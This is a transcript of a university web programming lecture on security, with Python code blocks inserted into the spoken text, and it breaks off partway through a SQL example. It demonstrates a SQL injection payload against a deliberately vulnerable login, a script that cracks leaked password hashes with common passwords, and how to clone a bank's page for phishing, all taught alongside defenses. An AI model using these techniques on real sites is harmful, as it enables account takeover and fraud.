[MUSIC PLAYING] BRIAN YU: Welcome back, everyone, to Web Programming with Python and JavaScript, and welcome to our final lecture. So we've talked about a lot over the course of web programming with Python and JavaScript. Everything from version control to designing what a web page looks like using HTML and CSS, and then moving into programming languages like Python and JavaScript that are used on the server side and on the client side in order to build and design web applications. And where I thought we'd conclude today is by talking a little bit about security, about making sure that our web applications are secure, thinking about what sorts of security vulnerabilities can come about when we're thinking about web applications and deploying them to the internet, and how we can best defend against those potential vulnerabilities. And in doing so, we'll be taking a look back at all of the topics that we've talked about so far in this course, going from Git to HTML, to looking at Flask, SQL, and API design, to programming in JavaScript, to using Django later on, to testing with continuous integration and continuous deployment, in addition to scalability. And we'll look through all of these past topics one at a time, thinking about where security vulnerabilities might arise in any of these potential areas, and how we might start to think about defending against them. Some of these things will be things we have alluded to or talked about a little bit over the course of the semester so far. But today, we'll really take an opportunity to look at all of these topics in a little more depth and think about what security vulnerabilities could come up in the process of dealing with any of these areas within a web program. So where I thought we'd start is at the very beginning by talking about Git. 
So we began the semester by talking about version control using Git and GitHub, in particular, as a way of hosting code online in a place where different people from around the world can have shared access to a repository of code where they can push code to it. Or they can pull code from it using different branches and features like pull requests in order to better collaborate on code. And GitHub is really built upon this idea of open-source software, of software where the code isn't hidden from people, but is available for potentially anyone who wants to look at that code, to see that code, and if they want to, propose pull requests or suggestions or changes to that code. And so let's think about open-source software just as a high-level idea right now. What are some security benefits of open-source software, and what are some potential security concerns that might arise? Sure. AUDIENCE: That lots of people can see it on both sides. BRIAN YU: Great. Lots of people can see it-- AUDIENCE: But they'll fix bugs. BRIAN YU: Right. And that has implications on both sides of things when it comes to bugs, which means that when you have a lot of different eyes all looking at the same code, there's a possibility that someone else might catch a bug that you missed when you were writing the software. But on the flip side of course, if someone is able to spot a vulnerability in your code by reading it and they don't tell you about it or any of the other maintainers of the code, now they're potentially able to take advantage of a security exploit in your code, something you didn't see coming before. And something that they wouldn't have otherwise known about had the code not been open-source. 
So open-source software in that sense can sort of be a double-edged sword where you have to be careful that with a lot of people all looking at the code, there's potential both for a lot of people to be able to help you in finding bugs and making security improvements to your code, but also areas where there might be vulnerabilities. And over the course of today, we'll be looking at some of those potential vulnerabilities that can exist inside of our web programs and taking a look at how we might start to try to defend against them. What other security considerations might come up when we're using Git and GitHub, in particular? If we're hosting our code online, you might think that with open-source software, we might be able to just make our repositories private. So GitHub has the option of making repositories private so that only certain people have access to your repository. So not everyone can potentially see it. But what dangers still might arise there? Multiple possibilities. Sure? AUDIENCE: Someone had access to your GitHub account. BRIAN YU: Sure. If someone had access to your GitHub account, all your code is now stored online. Which means if some enterprising hacker is able to somehow gain access to your account, then they might be able to take advantage of that. And so for a long time, most websites have operated under a model of username and password being the way that you log in to a website. And increasingly, there are ways that hackers try and bypass that, by trying to either guess passwords, by guessing frequently used passwords, or by trying to just guess many, many different passwords, trying thousands or millions of different password combinations in the hopes of at least getting access to some person's account. And so if hackers are doing that, trying to guess at passwords very quickly in order to try and gain access to accounts, what can web applications do in order to defend against that? 
In order to defend against hackers that might be trying to get into other users' accounts unauthorized. Sure? AUDIENCE: They could do things like only so many misses. You can only have so many wrong or perhaps another kind of authentication, also. BRIAN YU: Great. So different possibilities exist. One might be placing a limit on the number of times you can try to log in in any period of time. Maybe you can only log in, or attempt to log in, five times, and if you miss five times, then you have to wait potentially an hour until you're able to log in again, for instance. So many applications do that. And then you also talked about other authentication systems. So what other authentication systems could there be? AUDIENCE: So like the thing where you get a code pushed to your phone somehow. BRIAN YU: Great. So an increasingly popular form of authentication now is two-factor authentication. The idea that it's not just enough to log in with a username and password, but you might also want to log in with something else, something that is physically on you, like a phone for instance. Where, after you type in your username and password, a code is texted to your phone, or you use an app on your phone in order to get a special code, and then you have to type in that code. So that even if an attacker potentially knows your password, either by hacking into some database and finding the password or just by guessing it luckily, they're still not going to be able to access your account because they still have this added step of having to go through some two-factor authentication code. Where they now need to type in a particular code that is only available to someone that physically owns the device, like a phone. And that can also help to improve security as well. And so GitHub, for instance, has opt-in two-factor authentication where you can enable that for your account in order to make your GitHub account more secure. 
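The rate-limiting defense mentioned a moment ago (lock a user out after five misses for an hour) can be sketched in Python. This is a hypothetical in-memory version for illustration; a real site would track attempts in a shared store such as a database or cache, since a single dictionary disappears when the server restarts and isn't shared between servers.

```python
import time

# Hypothetical in-memory login rate limiter, for illustration only.
MAX_ATTEMPTS = 5        # five misses allowed...
WINDOW_SECONDS = 3600   # ...per hour, as in the example above

failed_attempts = {}    # username -> timestamps of recent failed logins

def login_allowed(username, now=None):
    """Return True if this username may attempt another login right now."""
    now = time.time() if now is None else now
    # Keep only the failures that happened inside the window
    recent = [t for t in failed_attempts.get(username, []) if now - t < WINDOW_SECONDS]
    failed_attempts[username] = recent
    return len(recent) < MAX_ATTEMPTS

def record_failure(username, now=None):
    """Call this whenever a login attempt uses the wrong password."""
    now = time.time() if now is None else now
    failed_attempts.setdefault(username, []).append(now)
```

After five recorded failures, `login_allowed` returns False for that username until the hour-long window has passed, which makes guessing thousands of passwords per minute impractical.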
And other websites are increasingly offering two-factor authentication as well, as just an additional means of trying to secure your accounts. And web applications are beginning to use that as a security measure as well. But let's think more broadly, not just about GitHub, but about Git in general, and this idea of version control and making changes and committing and saving those changes. And when we're thinking about pushing our commits to the internet, taking our changes that we've made in a GitHub repository and pushing them online, we want to be careful that sensitive information like a password or an access token for some service doesn't end up inside of a repository. Because if it does, then if it gets pushed online regardless of whether that repository is public or not, then there's a potential that other people might be able to see that access token when they probably shouldn't. And so imagine a situation where you're working on a repository. And you've made some commits and maybe accidentally, you put a password or some access token that you didn't mean to inside of one of the files, and you commit that file. And so credentials have now been exposed in one of the commits inside of your repository. And then later on down the line, you realize that mistake. You realize, oh, wait a minute, I put credentials inside that repository when I probably shouldn't have. And you make another commit removing those credentials from the file. So you add another commit, removing those credentials. And now those credentials are no longer in the head of the repository. You've taken them out, you've committed that removal. Is that secure? No. I see you shaking heads. Why not? AUDIENCE: Because you can see all the history. BRIAN YU: Great. Because of Git's version control system, the fact that it's saving every time you make a commit, it's saving your entire history. 
Which means that even though-- if you look at all of your files in their current state now-- those credentials are not there, anyone who has access to that repository has access to the full history of commits. They can go back and look at your previous commit messages, the previous files you've changed, and what your files looked like every stage along the way. And so once you've exposed those credentials, now even if you make another commit after that, those credentials are still going to be there. And so there are ways around this. There are ways of reverting back to a previous commit and pruning away all the extra commits, and then what we would call force pushing those commits back to GitHub in order to update it. But generally, once you've pushed code to GitHub, you might want to imagine all of that code as potentially compromised. So if you had passwords or security credentials or other keys inside of your repository that you accidentally pushed to GitHub, probably a good idea to just exchange those credentials altogether in order to get new ones because there is the potential that those credentials could be compromised once they're pushed. And so those are some security considerations that might come about when we're thinking about Git and GitHub. But let's turn now to actually writing code, taking a look at HTML. So HTML, remember, is what we were using at the very beginning of this semester and all throughout the semester in order to design web pages, and it just consists of tags, where we had our body tags and different tags for creating lists or creating forms or creating buttons and so on and so forth. What security vulnerabilities might come about from just purely HTML? Or how might HTML be used to trick users into doing something that a malicious attacker might want them to do? Yeah? AUDIENCE: In browser, we can see HTML by going to [INAUDIBLE]. BRIAN YU: Great. 
Inside of a browser, for instance, you can inspect a website, and you can take a look at all of the code. And so what are the implications of that? Well, that means that if I wanted to, I could, for instance, go into my browser and go to, I don't know, bankofamerica.com for instance. And I could pull up, OK, here's Bank of America's website, which is really just HTML that's been rendered onto my screen. And if I wanted to know what code is Bank of America using in order to make any of this stuff happen, I could reasonably control-click on the site, click on View Page Source, and what that pulls up for me is a whole bunch of HTML. It's a whole bunch of it, and I don't really know what all of it does. But if I just take it all and copy it to my clipboard, and I go into a text editor and create a new file-- I'll call it bank.html-- and I'm just going to paste in all of that code that I just copied off Bank of America's website. I didn't have to write any of it, just copied it straight from there. Now if I go ahead and open bank.html, this file I just created, now I've effectively recreated Bank of America's website just by copying their HTML. And if I now host this from my own web server, for instance, I might be able to trick unsuspecting users into thinking that this is actually Bank of America's website. Because just at first glance, it looks quite reasonably like the same thing because it's the exact same HTML. And if I'm really enterprising, I can think about actually trying to make modifications to this code in order to even better be able to try and maliciously take advantage of a user who might unsuspectingly be arriving at this site, not realizing that it's not the actual Bank of America website. 
I might, for instance, take this Forgot Passcode button down here-- which is probably a link to some page where they might type in their email address or try and type in some new passcode that they want for instance-- and I might just take this HTML file, and I'll just search for forgot passcode. And OK, here it is. Here's forgot passcode. And if we notice, it's located inside of an a tag-- an anchor tag-- which has this href attribute, which is going to be where the user is linked to if they were to ever click on that I forgot my password button. And so if I take this link, this secure.bankofamerica.com/login something, and instead of linking to that, link to, I don't know, https://cs50.github.io/web or whatever other page I want to redirect the user to. Now if I refresh the site, it looks like Bank of America's website once again, but when they go over here and they try and click on this Forgot Passcode button, now they're taken to our website or whatever website I want to take the user to. I can modify the HTML that they have in order to direct them anywhere. And so that's sort of one of the common ways that attackers are able to use HTML to try and trick users into doing something. In particular, noting the fact that you can take a link and make it look like it's going anywhere, but really take the user to somewhere that you want. I can have something like this where if I just have a href equals url1-- where url1 is where I want the user to be taken to and url2 is just the text that appears to the user-- then the user might reasonably be tricked into thinking that they're going to url2 when in reality, they're going to url1. And so a simple example of that might be inside of link.html here. We're in link.html. It's a very simple HTML website, where inside of my body tag, I have an anchor tag, which is just going to be a link. And the href of that link is this course's website, for instance. 
But in between the a tags, what I have is just google.com, for instance. And so what that means is that if I were to open up link.html, for instance, what the user sees is something like this, a page that just has a link to Google. And they might reasonably think that clicking on that link should take them to Google when in fact, when they click on that link, they're taken here instead, to the course web page. And so you can imagine how this might actually be able to be used in order to create potential exploits. So that if someone were to take Bank of America's URL, and I go to link.html and say, all right, we'll put Bank of America here, and in the href, instead put bank.html, for instance, which is the link to the file that I created copying Bank of America's code. Now suddenly, when I open up link.html, I get a link that looks like it is linking to Bank of America. I click on that link, and I get a page that looks like Bank of America's website. And if I click on forgot my passcode, now I'm redirected to some other site altogether. And so these are common ways that exploits are able to happen by taking advantage of security vulnerabilities like this where we're really just relying on people not being aware of the fact that clicking on a link might take them to somewhere else different altogether. And so how do you defend against things like this? Well, one good strategy from the user end is just to be careful about the links that you're clicking. In Chrome, for instance, if you hover over a link, down in the lower left, you can see this-- it's in small text, so you might not be able to see it, but this is the actual link that this link is going to be going to. So you can't always trust what the text is. You might want to look very carefully at where that link is actually taking you. And so these are just some examples of HTML being used in order to create potential security exploits. Questions about any of that so far? Yeah? 
AUDIENCE: So why does our browser allow us to see a source code in the first place? BRIAN YU: Great question. Why do web browsers allow us to see the source code in the first place? Well, in a sense, the web browser, what it's getting is the source code. So when a web browser is making a request to bankofamerica.com, for instance, bankofamerica.com needs to give back information to my computer. And that information needs to be the code, the HTML, that is going to render the page. So hypothetically, a browser might be able to just not make it easily accessible to get to that source code. But anyone who wants to, if you're really enterprising, could just look at the information that's coming back from the server. That information will contain the source code one way or another. So there's really no way to hide it. Good question, though. All right. So that was HTML being used in order to create potential security vulnerabilities or security exploits. Let's take a look now, by moving on one week, and talking about Flask. So we talked about moving on from just creating static web pages that are displaying HTML content to using a web server, where we're communicating between the server and the user, sending packets of information along the internet. And as soon as we start dealing with that, packets of information going from one server to a client, traveling between routers, now we start to deal with other security concerns as well. So here, we'll start to talk about HTTP, Hypertext Transfer Protocol, which is typically used to send packets of information across the internet, as well as HTTPS, which is a more secure version of that, which we'll take a look at in just a moment. So let's imagine this diagram. I have one computer here, maybe it's a server running some Flask web application. And I have a client over here, which is maybe asking for information from that web server. 
In other words, I've got two computers that need to communicate with each other over the internet somehow. And maybe they've never communicated with each other before, so they need to talk to each other somehow. And so this computer might want to send packets of information to the other computer. But of course, that information doesn't go to the other computer directly. It needs to travel over the internet, traveling between different routers and different servers for instance, before it gets from point A to point B. And likewise, when information wants to come back from that computer over there to this computer, we also need to have information that is traveling through the internet that's potentially going to all of these routers in between. And so just looking at this diagram, what's a security vulnerability that seems clear just from a basic perspective? Yeah? AUDIENCE: Changing HTTP header could-- BRIAN YU: Great. So changing HTTP headers. That's an interesting thought, that if this request is getting passed from-- a request goes from this computer through all these routers into this computer, potentially, one of the servers in the middle, one of these routers, might be able to change that request, for instance, in order to try and make a request that's slightly different than what the original user wanted. Or likewise, because any of these intermediary routers have access to the full contents of whatever request is being passed or response is being passed back and forth between these two computers, anyone in the middle of this process could potentially take that information and have access to it. They could read an email that's being sent or the contents of a web page response that's being sent from one computer to the other because that packet of information is just traveling over the internet. So how do we solve that problem? Yeah? AUDIENCE: Encrypt traffic. BRIAN YU: Encrypt traffic. Great. 
Cryptography is this idea of encrypting information, of making sure-- so that we can encrypt our information so it's not the plain text of the request or the response that's getting sent over the internet, but rather some ciphertext, some encrypted version of that plain text, such that someone in the middle can't just immediately read it. And there are all sorts of different cryptography algorithms. And we'll talk high level about a couple of the ideas that go behind cryptography. And so one form of cryptography you might hear about is secret key cryptography, where the idea there is that we have a secret key that only I know and only the person at the other computer that I want to communicate with knows. And that key can be used with my cryptographic algorithm to encrypt my plain text. I take my plain text and use my secret key to encrypt it into ciphertext. Or likewise, I can use the key to decrypt information. If I have ciphertext, something that's already been encrypted, I can use that key along with the ciphertext in order to generate plain text. And so you might imagine a diagram where I have one computer over here and I'm trying to communicate with a computer down there. I have this secret key, this ability to encrypt and decrypt information, and I also have the plain text of what it is that I actually want to encrypt, the message that I want to send from one place to the other. And so what might reasonably happen? What I do in secret key cryptography is first use the key to encrypt the plain text, generating some ciphertext, some encrypted version of the plain text that someone without the key wouldn't be able to understand. So then I would need to transfer the ciphertext to this computer. 
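The secret-key round trip being described, where one shared key both encrypts and decrypts, can be illustrated with a toy XOR cipher in Python. This is for illustration only and is NOT real cryptography; real systems use vetted algorithms like AES, but the shape of the exchange is the same.

```python
# Toy secret-key cipher using XOR, for illustration only -- NOT real cryptography.
# The point is just that one shared secret key both encrypts and decrypts.

def xor_cipher(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the key (repeating the key as needed).
    Applying the function twice with the same key returns the original data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

plaintext = b"attack at dawn"
secret_key = b"shared-secret"

ciphertext = xor_cipher(plaintext, secret_key)  # what actually travels over the network
recovered = xor_cipher(ciphertext, secret_key)  # the receiver, holding the same key
```

Only the ciphertext crosses the network; anyone intercepting it without the key sees bytes that look like noise, while the receiver with the same key recovers the plaintext exactly.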
And if this computer has both the ciphertext and a copy of that same secret key, then they can use that key in order to decrypt that ciphertext and regenerate the plain text-- find out what it is that I actually intended to happen-- such that now, the plain text was never transferred from one computer to the other. I was only ever transferring the ciphertext from one computer to the other. Does anyone see a problem with what we just did there? It seems like no plain text is ever transferred. What could go wrong? Yeah? AUDIENCE: How do you send the key? BRIAN YU: Great. How do you send the key? That somehow, I need to have this key and the person over here also needs to have that key. And if I'm just sending the key over the internet from one computer to the other, which I would theoretically need to do because otherwise I have no way of communicating with the other computer, then we've just created the same problem again. That any of these routers, these intermediary pieces, over the course of this communication from computer A to computer B, could just intercept the key and intercept the ciphertext. And now they have all the pieces they need in order to regenerate the plain text. So this secret key cryptography works if and only if only I and only the other person have access to the key. And it doesn't work so well if this key is something that needs to be transferred plainly over the network in order to get to the other person, because then anyone could just intercept that key. And so how do we solve that problem? Well, one solution people have come up with is this idea of public key cryptography. And this is very common, and it's what HTTPS uses in order to securely transfer information over the internet. And the idea there is instead of having just one key, we have two keys. We have a public key and a private key. And these are related in a particularly important way, and the details have to do with a lot of mathematics. 
But the general idea is that the public key is something that you should be able to share with anyone, and the public key can only be used to encrypt information. It will take plain text and it'll generate the ciphertext, the encrypted version. But it doesn't go in the other direction. It can only be used to encrypt data. And likewise, the private key is something that you should only ever keep to yourself. You should never share your private key with anyone else. And the private key can be used to decrypt data. That if I have encrypted information that was encrypted using the public key, I can use the private key in order to decrypt it. So what does that model look like if I now have two computers that want to communicate with each other? I still have this computer over here that wants to send this plain text over to this computer, but wants to do so securely. So the first thing that's going to need to happen is that this computer, computer B down here, gives its public key to computer A. And that's OK because the public key is something that can be shared with anyone. Anyone's allowed to see it because the public key can only be used to encrypt data. It can't be used to decrypt data. And so now computer A, having access to the plain text and the public key, now has the ability to encrypt the plain text, generating the ciphertext. That ciphertext then gets transferred down to the other computer. And now computer B has both the ciphertext, this encrypted information that nobody along this path was able to read or see, and also has access to this private key that only they had access to. And that is the only thing that can be used in order to take the ciphertext and decrypt it and figure out what it is that the message actually is. And now computer B has the ability to regenerate the plain text from it. 
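The public/private key exchange just walked through can be made concrete with textbook RSA using tiny numbers. This is a sketch for illustration only: real RSA keys are thousands of bits long and real implementations add padding schemes, but the encrypt-with-public, decrypt-with-private structure is exactly the one described above.

```python
# Textbook RSA with tiny numbers, for illustration only.

# Key generation (done once by computer B):
p, q = 61, 53                  # two primes, kept secret
n = p * q                      # 3233, part of both keys
phi = (p - 1) * (q - 1)        # 3120
e = 17                         # public exponent
d = pow(e, -1, phi)            # 2753, private exponent (modular inverse of e)

public_key = (n, e)            # computer B shares this with anyone, including A
private_key = (n, d)           # computer B never shares this

def encrypt(m, key):
    n, e = key
    return pow(m, e, n)        # anyone holding the public key can encrypt

def decrypt(c, key):
    n, d = key
    return pow(c, d, n)        # only the private-key holder can decrypt

message = 65                   # messages here are just numbers smaller than n
ciphertext = encrypt(message, public_key)    # computer A encrypts...
recovered = decrypt(ciphertext, private_key) # ...and only computer B can decrypt
```

Notice that an eavesdropper who sees both the public key `(3233, 17)` and the ciphertext still cannot easily decrypt, because recovering `d` requires factoring `n` back into `p` and `q`, which is what becomes computationally infeasible at real key sizes.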
And so now we've been able to come up with a secure way of allowing computer A and computer B to communicate with each other, just by allowing them to use this public and private key pairing such that the public key is used to encrypt the information and is shared with everyone, and the private key is only used for decrypting the information. And it doesn't matter if the intermediaries have the public key because that just means other people might be able to encrypt the data, but not necessarily be able to decrypt that information. Questions about that or any problems that we see with that model? OK. In that case, we'll go ahead and move on to talking about our next subject, which is going to be environment variables. And so environment variables are something we've seen a little bit of in Flask before, and probably in Django as well. But we'll talk about it in the context of trying to make our applications more secure. So we talked about, in the context of Git earlier, that we rarely, or probably never, want to put passwords or other secure, confidential information inside of our source code. Because as soon as we push a password or an access token to a GitHub repository, now suddenly anyone who has had access to that repository could theoretically be able to see it. Or if someone gets access to your GitHub account by some means or another, they would also be able to see that password or access token. Maybe that's going to be an access token that is the access token for getting access to your database, for instance. Or it's your access token for whatever cloud provider you're using, like Amazon Web Services, in order to deploy your application to the internet. 
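One standard way to keep credentials like these out of source code is to read them from environment variables at runtime. A minimal sketch follows; the helper name `load_secret_key` is hypothetical, and the point is simply that the value comes from the machine's environment rather than from a file checked into version control.

```python
import os

# Hypothetical helper: read a secret from the environment, not from source code.
# Before running the app, the key would be set in the shell, e.g.:
#   export SECRET_KEY=some-long-random-string

def load_secret_key(env=os.environ):
    """Return the secret key from the environment; fail loudly if it is missing."""
    key = env.get("SECRET_KEY")
    if key is None:
        # Stopping the app is safer than silently falling back to a known default
        raise RuntimeError("SECRET_KEY environment variable is not set")
    return key

# In a Flask app this would then be used as:
#   app.secret_key = load_secret_key()
```

With this pattern, pushing the repository to GitHub exposes only the fact that a secret key exists, never its value.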
So rather than doing something like this: if you've used Flask before and have used its cookie-based sessions, you need to set a secret key inside of your application, where you might have set the secret key to just be some random string of characters, which is totally fine for just running the application. But this isn't all that secure, because as soon as you push this file to the internet, now anyone who has access to your repository theoretically has access to your secret key as well. And so these are often cases where we would want to use environment variables, using variables that are located just inside of the system on the computer where your program is running, such that we can replace the key with os.environ.get("SECRET_KEY"). In other words, get the environment variable called SECRET_KEY and use it as the secret key so that inside your code, now it just says this. So nobody who reads your code knows what the secret key for your application is, but only the computer on which this program is running, which, theoretically, has that secret key set as one of its environment variables, will then be able to use it. And so environment variables in that sense can be a very valuable tool when it comes to trying to make sure that we're not exposing information that we didn't want to expose when we were creating our application. Questions about environment variables? All right. So that was Flask. And let's go ahead now and move on to talking about SQL. So we talked a lot about databases and how we might go about designing databases. And in a couple of our projects now, we've had to create a table that is able to manage a database of users, where users are able to log in and log out. And in order to do that, we needed some sort of database structure in place such that users were able to be remembered by our system, so that they could log in and have passwords and so on. 
And you might imagine that a users table might have looked something like this, where each user has an ID, each user has a username, each user has a password. What are potential design problems or security vulnerabilities with a table that's designed like this? Yep? AUDIENCE: If someone gets their hands on the database, they can see all the passwords. BRIAN YU: Yeah. So obviously, we want to keep our tables secure. We don't want to let just anyone have access to our database. But if by some chance, someone got access to our database, either because they managed to figure out what the password is or they got access to it in some other way, now suddenly they have access to all of the different passwords that are inside of this database. They know what everyone's password is, and now that's a major security vulnerability. Especially if some of these users might be using these same passwords not only on one website, but on many other different websites. Now their password could be compromised across a number of different websites as well. And so what might be a solution here to avoiding needing to store the password inside of the table? And this might be something that you've already done in some of your existing projects. AUDIENCE: Encrypt the passwords. BRIAN YU: Yeah. Encrypt the password. In other words, don't just store the plain text of the password, store some version of the password. And in particular, we'll generally store what we call a hashed version of the password. Where a hash function is just going to be some function inside of your code that takes text like a password and generates, deterministically, some long sequence of characters that's seemingly random that is associated with that text. And so every time you put hello in as the password and hash it, you'll always deterministically get the same output. And so then your users table might look something like this. 
Where you've got all of your users, but in your password column, instead of storing the actual password in plain text, you're storing some hashed version of that password. Such that hello generates this text as the password instead of just storing hello. So now if someone gets access to this database, they're still not going to be able to log into Anushree's account, for instance, if they go to the website because they're not going to know what password corresponded with this long sequence of characters. And generally, hash functions are designed to be one-way functions. That you can go from the plain text, the password, to this hashed version. But it's very, very computationally difficult to go backwards, to go from this hashed version to what the password originally was in order to generate this. And so what are the security implications of this model? How do we now log in a user, now? In this model. If someone were to log into a website, what logic would need to happen if we're no longer storing passwords but storing hashed passwords? Yeah? AUDIENCE: They could take the password they enter, you run through your hash algorithm, and you see if it matches what's in your file. BRIAN YU: Wonderful. User logs in with their username and password. You take that password and you hash it, and you check to make sure that the hash matches up. And because our hash function is deterministic, the same input will output the same output every single time. If they did input the correct password, then the hashes should theoretically line up. Have you ever used a website before where, when you forget your password, you might want the website to just tell you what your password is, but the website says, sorry, we can't tell you what your password is, but we can let you reset your password. With this in mind, why might that be the case? Why can a website sometimes not tell you what your password is but still allow you to reset it? 
Or still be able to log you in if you knew your password? AUDIENCE: Because they're not storing it in text anymore. So we don't know-- BRIAN YU: Great, exactly. It's because of this idea of the one-way hash function. That if you take the password, you can generate this hashed version. But it's very difficult to go the other way around. Such that, if this is what I have access to in my database, I can look at this, and I don't actually know what Anushree's or Elle's password originally was. But if you give me their password, then I can hash it and compare it for you and maybe be able to tell you that as a result. But I could reset it if I wanted to just by replacing this field with some new hashed value. That would be something that I could do, but I might not be able to actually tell you what that password is. Of course, if these passwords are common, like these are-- if they're just passwords like hello or password or 12345-- then how might I still be able to figure out a user's password even if the database looks like this? Yeah? AUDIENCE: You hash it and compare the hashes, or you can look for common hashes and see. BRIAN YU: Exactly. If you know what the hash function is, then a malicious user trying to exploit the system might be able to just try a whole bunch of different common passwords, figure out what their hashed versions are, and then compare them to the versions that are here in order to figure out what the password might be. So even this is not 100% foolproof. Someone who is trying a bunch of common passwords might still be able to figure out what it is that's going on inside of this system. And so that's certainly one vulnerability that could come up when we think about database design. But another vulnerability, and this is one we talked about a little bit a couple of weeks ago, but we'll dive into in a little more depth now-- well, actually, first, before we get there, sorry. 
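That dictionary-style attack might look like the following sketch, where the leaked hashes and the list of common passwords are both hypothetical:

```python
import hashlib

def hash_password(password):
    return hashlib.sha256(password.encode()).hexdigest()

# Hypothetical leaked table of hashed passwords from a database dump.
leaked = {
    "anushree": hash_password("hello"),
    "bob": hash_password("12345"),
}

# The attacker hashes a list of common passwords ahead of time...
common_passwords = ["password", "hello", "12345", "qwerty", "letmein"]
lookup = {hash_password(p): p for p in common_passwords}

# ...then compares each leaked hash against the precomputed table.
for user, digest in leaked.items():
    if digest in lookup:
        print(user, "was using the common password:", lookup[digest])
```

This is one reason real systems add a random per-user salt before hashing: the same password then hashes differently for every user, so a single precomputed table of common-password hashes no longer works.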
So this was that Forgot Your Password screen that we were talking a little bit about before, where oftentimes what might happen is you'll type in an email address, for instance, and you'll click Reset Your Password. And that will send you an email that gives you the ability to reset your password. So another possible way our databases could be insecure, another place we might have vulnerabilities in the security of our database, is in what information might be leaked by our database. What information can get out when we don't want it to get out? And can anyone see a potential vulnerability here, in terms of information leakage? Information that might be exposed that we might otherwise not want exposed, just from a user interface like this that people can use? AUDIENCE: Your email address might be exposed as it's going over the web. BRIAN YU: Great. So your email address is potentially exposed as it's traveling from one point to another. Although, with HTTPS and trying to encrypt that information, usually we can help to defend against that. But certainly the idea of typing in an email address and clicking on reset password leads to potential information leakage in other ways. Whereby if I type in an email address of my account that I've perhaps forgotten my password to, or a friend's account that I think they've forgotten their password to, and I click Reset Password, then I might see a notification that might just say, password reset email sent. What if I typed in the email address of someone who didn't have an account on the website? What might you expect this website to do? Yeah? AUDIENCE: Give you an error message. BRIAN YU: Should give you an error of some sort. Something like, error, there is no such user with that email address. And now that we've seen those two screens, you type in an email address and sometimes you get password reset email sent and sometimes you get error, there is no user with that email address. 
Where is the potential information leakage here? Yeah? AUDIENCE: You could figure out who the users are by trying out different emails. BRIAN YU: Great. Now, by using this screen, even if I don't know people's passwords, I can figure out who has an account with this website and who doesn't, right? If it's a bank, for instance, and I type in someone's email address and I get this screen, password reset email sent, now I know that this particular user has an account with this bank. And that might not be something that your application wants to expose. And so as you go about designing web applications, you always want to be bearing these things in mind. Thinking about what information from the database is being exposed, and how information that I don't want exposed might end up exposed to users that I don't want to have access to that information. And certainly, in this particular example, maybe you don't really care if your users are able to know whether other people have accounts on the website or not. But in a place where whether or not a user has an account is more sensitive, this might be something you do care about. And you'd want to think carefully about how you design the user interface, about how users are interacting with the database, and whether or not you're ever exposing information that you don't want to ultimately be exposed to the user. Questions about any of that? OK. So now moving on to the topic of SQL and vulnerabilities that we did talk about a couple weeks ago, namely SQL injection. And does anyone recall what SQL injection is and why it's a problem? Yeah? AUDIENCE: So in a SQL query, we added an or condition. BRIAN YU: Great. We were able to add an or condition, or more generally, just some sort of SQL code into input for instance, and get our own SQL code to run on someone else's server. 
So we were able to effectively do whatever we wanted with the database because we could run arbitrary SQL queries on that database. And so the example we looked at, which we'll look at an actual Flask example of that today, is a user name and password field where we might use that information on the back end to run a SQL query that looks something like this. Select star from users where user name equals whatever the user name was and password equals whatever the password was. And we imagine that if a user logs in, like Alice with the password hello, then we'd end up running a query that looks something like this, substituting in Alice as the username, hello as the password, and now we're selecting from all the users where Alice is the username and hello is the password. And if there is a matching one, then this will return a row, and otherwise, it won't. And of course, in this case, the password is not hashed, though in a more secure system, we might want to hash that password first and then run this query. But what might go wrong here? So we talked about what would happen if someone types in Alice as the user name and something like this as the password, 1'OR'1'='1, which seems sort of complicated, but the result of that was that when we plugged everything in, now we're selecting from users where the user name is Alice and the password is 1-- which it isn't-- or the string 1 equals the string 1. Well, this is, of course, true, and now we're going to get some row back. And so how might that actually work in practice? Let's take a look at a web application that implements this very idea of just a very simple login system where an exploit like this can help anyone get access to any other user account. So let's take a look at injection and application.py. So this is just a Flask application, and our default route, this index route, first checks if there is a username inside of the session. 
If there is a username in the session, in other words, if someone is logged into this current session, we'll go ahead and render a user.html page that will just display who's currently logged in, for instance. Otherwise, if there is no user, then we're going to go ahead and render a login.html page that would give people the option to log into this website. And now, let's take a look at what's happening inside of the login function. So the first thing we're doing is someone logs in by submitting a post request to /login. Then we get the username by going request.form.get("username"). We get the password by request.form.get("password"), just extracting that information from the form. We're going to print out what the query is. You'll see an example of that in a moment, but this isn't strictly necessary. The interesting thing is here, on line 33. We're running db.execute, running a database query, and saying, select star from users where username equals and then plugging in the username here, and password equals, plugging in the password there, and then just getting the first row that comes back from that. And if a row does come back from that, if the query was successful, then we log the user in by storing them inside the session and redirecting them back to the index page. Otherwise, we render the login page again with invalid=True, meaning there was some authentication problem. So that's all fairly straightforward. And of course, the key vulnerability to look at here is the fact that whatever the username and whatever the password is, we just plug them straight into the SQL query by using string concatenation in Python to join this all together. So now if I were to run this Flask application and take this URL and go to that URL, I'm faced with this login form. 
And I can type in Alice-- and normally you would want your password field to use dots by setting the input type to be password so nobody can see it, but for the sake of example, so you can see what I'm doing, I've changed the password field to just be a text field so you can see what password is being typed in. But of course, you would never actually want to do that in practice. But if I type hello as the password, which is Alice's password, and click Submit, now I'm logged in as Alice. It says, Welcome, alice. And you can check by looking at the log. Here's what got printed out. Here was the query that ran. Select star from users, where username equals Alice and password equals hello, and of course, that returned back Alice as my one row, and so that was all good. I'll log out now. If I try logging in as Alice with a fake password, goodbye, which is not the correct password, and Submit, I get Error, invalid credentials. Why is that? Well, here is the query that ran. Select star from users, where username is Alice and password equals goodbye. Well, that's not going to return any results. But of course, the injection attack happens if I type username Alice, or any username that I want, and type in 1'OR'1'='1 as the password, like that, where now if I submit that, no matter who the user is, now I see, Welcome, alice. I've logged into this user's account, and why did that happen? Well, here's the query that was run. Select star from users where username equals Alice and password equals 1 or 1 equals 1. So by injecting arbitrary SQL logic into this code, I was able to gain access to any user account that I wanted to. And that's why it's very important, when we're using SQL and running SQL queries, that we're careful to avoid SQL injection. That any time user input is being put into a query, we want to escape any potential characters that might be part of a SQL query in order to make sure that nobody can just run whatever SQL queries they want to inside of our code. 
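The login demo above can be reproduced with Python's built-in sqlite3 module. This is a hedged sketch, not the lecture's actual application.py: the table and credentials mirror the example, vulnerable_login builds the query by string concatenation just as the app did, and safe_login shows the parameterized alternative (sqlite3 uses ? placeholders; SQLAlchemy's named parameters work the same way):

```python
import sqlite3

# In-memory stand-in for the lecture's users table.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
db.execute("INSERT INTO users (username, password) VALUES ('alice', 'hello')")

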